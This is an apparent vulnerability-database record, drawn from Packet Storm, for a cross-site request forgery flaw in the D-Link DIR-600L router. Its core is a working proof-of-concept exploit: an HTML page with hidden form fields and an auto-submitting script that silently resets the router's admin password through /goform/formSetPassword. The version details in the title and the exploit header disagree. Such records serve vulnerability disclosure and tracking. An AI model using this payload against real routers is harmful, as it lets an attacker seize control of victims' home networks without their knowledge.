ID

VAR-E-201403-0276


TITLE

D-Link DIR-600L Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 125815

DESCRIPTION

D-Link DIR-600L hardware version AX and firmware version 1.00 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 125815

AFFECTED PRODUCTS

vendor: d link | model: dir-600l | scope: - | version: -

Trust: 0.5

sources: PACKETSTORM: 125815

EXPLOIT

####################################################################################

# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00 CSRF Vulnerability
# Google Dork: N/A
# Date: 20/03/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage: http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router
# Software Link: N/A
# Hardware Version: E4
# Firmware Version: 5.10
# Tested on: Router Web Server
# CVE : N/A

###################################################################################

Cross Site Request Forgery



This modem's web application suffers from cross-site request forgery, through which an attacker can manipulate user data by sending the user a maliciously crafted URL.

The modem's application does not use any security token to protect it against CSRF. You can manipulate any user data. PoC and exploit to change the user password:

In the PoC, the IP address in the POST is the modem's IP address.

<html>
<body>
<form id="poc" action="http://192.168.0.1/goform/formSetPassword" method="POST">
<input type="hidden" name="settingsChanged" value="1" />
<input type="hidden" name="config.login_name" value="admin" />
<input type="hidden" name="config.password" value="YWRtaW4A" />
<input type="hidden" name="config.web_server_allow_graphics_auth" value="false" />
<input type="hidden" name="config.web_server_allow_wan_http" value="false" />
<input type="hidden" name="config.web_server_wan_port_http" value="8080" />
<input type="hidden" name="config.wan_web_ingress_filter_name" value="" />
<input type="hidden" name="wan_ingress_filter_details" value="" />
</form>
</body>
<script type="text/javascript">
document.getElementById("poc").submit();
</script>
</html>


______________________

*Dhruv Shah* *aka Snypter*


Trust: 0.5

sources: PACKETSTORM: 125815

EXPLOIT HASH

LOCAL

SOURCE

md5: 8cb469bac7accc74cd1f462560b56d45
sha-1: f46d321584cf74dd006483551e3e7f94f86e8956
sha-256: b631009354d41628f2c1a41d39df88b0765f8bdcbeae0b5ff610a03d682399e6

Trust: 0.5

sources: PACKETSTORM: 125815

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 125815

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 125815

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 125815

CREDITS

Dhruv Shah

Trust: 0.5

sources: PACKETSTORM: 125815

EXTERNAL IDS

db: PACKETSTORM | id: 125815

Trust: 0.5

sources: PACKETSTORM: 125815

SOURCES

db: PACKETSTORM | id: 125815

LAST UPDATE DATE

2022-07-27T09:21:53.238000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM | id: 125815 | date: 2014-03-20T20:55:55